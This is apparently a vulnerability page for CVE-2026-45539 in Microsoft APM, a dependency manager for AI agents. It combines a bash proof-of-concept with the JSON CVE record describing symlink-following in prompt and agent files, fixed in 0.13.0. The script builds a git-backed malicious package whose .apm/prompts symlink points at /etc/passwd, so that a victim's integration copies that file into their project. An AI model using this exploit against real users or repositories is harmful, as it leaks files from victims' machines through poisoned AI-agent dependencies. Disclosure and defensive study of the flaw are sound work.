CVE-2026-45539

#!/bin/bash # PoC for CVE-2026-45539: Microsoft APM Symlink Vulnerability # This script simulates creating a malicious APM package. MALICIOUS_DIR="malicious_apm_package" TARGET_FILE="/etc/passwd" # Target file to steal on the victim's machine # Create the directory structure required by APM mkdir -p "$MALICIOUS_DIR/.apm/prompts" # Create a symbolic link inside the prompts directory # This link will be followed by the vulnerable APM client ln -s "$TARGET_FILE" "$MALICIOUS_DIR/.apm/prompts/leak.prompt.md" # Initialize a git repo to simulate remote dependency cd "$MALICIOUS_DIR" git init git add -A git commit -m "PoC: Malicious package with symlink for CVE-2026-45539" echo "[+] Malicious package created at: $(pwd)" echo "[+] If a victim integrates this package using vulnerable Microsoft APM," echo "[+] the content of $TARGET_FILE will be written to their deploy directory."

{"cve": {"id": "CVE-2026-45539", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:48.887", "lastModified": "2026-05-15T17:16:48.887", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob() / Path.rglob() calls and read each match with Path.read_text(), transparently following symbolic links. A symlink committed inside a remote APM dependency under .apm/prompts/<x>.prompt.md or .apm/agents/<x>.agent.md is preserved verbatim into apm_modules/ on clone and then dereferenced during integration, with the resolved content written as a regular file into the project's deploy directories. The package content_hash, the pre-deploy SecurityGate scan, and apm audit do not flag this. The deploy roots are not added to the auto-generated .gitignore, so the resulting files are staged by git add by default. This vulnerability is fixed in 0.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4", "source": "[email protected]"}, {"url": "https://github.com/microsoft/apm/security/advisories/GHSA-q5pp-gvjg-h7v4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}